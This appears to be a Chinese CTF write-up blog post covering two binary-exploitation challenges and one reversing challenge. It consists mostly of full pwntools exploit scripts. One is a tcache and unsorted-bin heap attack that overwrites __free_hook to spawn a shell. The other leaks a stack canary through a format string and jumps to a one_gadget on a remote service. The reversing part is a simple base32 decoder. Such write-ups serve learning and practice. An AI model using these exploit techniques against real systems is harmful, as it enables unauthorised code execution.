PWN2
做出来了两个pwn题目(其中一个是复现出来的。。。。):
首先说一个pwn2,这个题目真是让我张了不少知识,不仅理解了tcache和unsorted bin attack还学会怎么patch elf文件的libc和ld链接器,同时学了一波文件的_IO_stdout_,下面贴一个“改革春风吹满地”大佬写的exp
#coding=utf-8
from pwn import *
local = 1
exec_file="./easy_heap"
context.binary=exec_file
context.terminal=["tmux","splitw","-h"]
elf=ELF(exec_file,checksec = False)
if local :
argv=["/glibc/x64/2.27/lib/ld-2.27.so","--library-path","/glibc/x64/2.27/lib/","./easy_heap"]
a=process(argv=argv)
libc=ELF("/glibc/x64/2.27/lib/libc.so.6")
else:
a=remote("")
def get_base(a):
text_base = a.libs()[a._cwd+a.argv[0].strip('.')]
for key in a.libs():
if "libc.so.6" in key:
return text_base,a.libs()[key]
def debug():
#text_base,libc_base=get_base(a)
#script="set $text_base="+str(text_base)+'\n'+"set $libc_base="+str(libc_base)+'\n'
script='''
b *(0x7ffff7bd5000+0x0000000000009E2)
b *(0x7ffff7bd5000+0x00000000000009FE)
'''
gdb.attach(a,script)
def fuck(address):
n = globals()
for key,value in n.items():
if value == address:
return success(key+" ==> "+hex(address))
def menu(idx,flag=True):
if flag:
a.sendlineafter("2. free\n",str(idx))
else:
a.sendlineafter("2. free",str(idx))
def add(content,flag=True):
menu(1,flag)
if flag:
a.sendafter("content:\n",content)
else:
a.sendafter("content:",content)
def delete(idx,flag=True):
menu(2,flag)
if flag:
a.sendlineafter("\n",str(idx))
else:
a.sendlineafter(":",str(idx))
add(p64(0x91)+p64(0x91))#0 90是为了之后进入unsortbin
add(p64(0x21)*6)#1
add(p64(0x21)*6)#2
delete(0)
delete(0)
delete(0)
add('\x70')#3 //修改最低字节这时候tcache的最后一个被改成0x70结尾
add('A')#4 拿出一个
add('A')#5 get fake chunk 拿到目标
for i in range(8): #多次free进入unsortedbin拿到arean地址
delete(5)
add('\x60\x07\xbd')#6 地址修改到stdout
delete(3)
delete(3)
delete(3)
delete(3)
add('\x70')#7
add('\x70')#8
add('/bin/sh\x00')#9
add(p64(0xfbad1800)+p64(0)*3+'\x00')#10
a.recvuntil(p64(0xfbad1800))
a.recvuntil("\x7f")
libc_base=u64(a.recvuntil("\x7f")[-6:]+'\x00\x00')-131-libc.symbols["_IO_2_1_stdout_"]
fuck(libc_base)
delete(7,False)
delete(7,False)
add(p64(libc_base+libc.symbols["__free_hook"]-8),False)#11
add('A',False)
add("/bin/sh\x00"+p64(libc_base+libc.symbols["system"]),False)
delete(9,False)
a.interactive()
PWN1
还有就是一个栈的题目了,这个题目跟平常哪个格式化字符和栈溢出有所不同,因为它限制了格式化可以打印出的栈里面的数据,本来还有点没头绪,但是得大哥指点,64位的机子上寄存器里面还有很多参数呢,乌拉,果真在寄存器里面泄露出来了一个真实地址哦,真实顶哦:
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.log_level = 'debug'
r = remote('120.55.43.255',30022 )
#r = process('./easy')
libc = ELF('libc-2.23.so')
r.recvuntil('Input your name:\n')
one_gadget_offset = 0x4526a
payload1 = '%7$p' #7
payload3 = '%3$p' #7
r.send(payload1)
canary = int(r.recv()[0:18],16)
print 'canary = ' + hex(canary)
#r.recvuntil('note:\n')
payload2 = 'a' * 8 + p64(canary) + 'b'*8 + '\x30\x4a'
r.send(payload2)
r.recvuntil('Input your name:\n')
#gdb.attach(r)
r.send(payload3)
ret_1 = int(r.recv()[0:14],16) - 0xf7260
#raw_input('@:')
print 'addr = ' + hex(ret_1)
system_addr = ret_1 + one_gadget_offset
r.recvuntil('Input the note:\n')
print 'system_addr = ' + hex(system_addr)
payload2 = 'a' * 8 + p64(canary) + 'b' * 8 + p64(system_addr)
r.sendline(payload2)
r.interactive()
RE1
这个就比较简单了,主要的难点可能就是一个苹果系统的文件,如果你没有mac,或者没有黑苹果的话,就没法子动态调试,不过base32还是比较容易看出的吧,然后在有一个简单的加密就可了。
key = [1,2,3,1,4,5,6,7,8,9,10,11,12,13,14,6,15,16,5,17,4,15,10,24,15,18,11,19,20,6,5,1,13,18,17,12,5,10,13,1,44,17,3,13,5,52,4,13,17,21,43,11]
flag = {1:'G',2:'5',3:'S',4:'I',5:'Z',6:'B',7:'V',8:'H',9:'F',10:'R',11:'T',12:'E',13:'Y',14:'L',15:'M',16:'U',17:'D',18:'4',19:'Q',20:'O',21:'C',22:'G5',23:'5S',24:'SG',25:'GI',26:'IZ',27:'ZB',28:'BV',29:'VH',30:'HF',31:'FR',32:'RT',33:'TE',34:'EY',35:'YL',36:'LB',37:'BM',38:'MU',39:'UZ',40:'ZD',41:'DI',42:'IM',43:'MR',44:'RS',45:'SGM',46:'M4',47:'4T',48:'TQ',49:'QO',50:'OB',51:'BZ',52:'ZG',53:'GY',54:'Y4',55:'4D',56:'DE',57:'EZ',58:'ZR',59:'RY',60:'YG',61:'GR',62:'RSD',63:'DS',64:'SY',65:'YZ',66:'ZZ',67:'ZGI',68:'IY',69:'YD',70:'DC',71:'CM',72:'MRT'}
s = ''
for i in key:
s += flag[i]
import base64
print base64.b32decode(s)
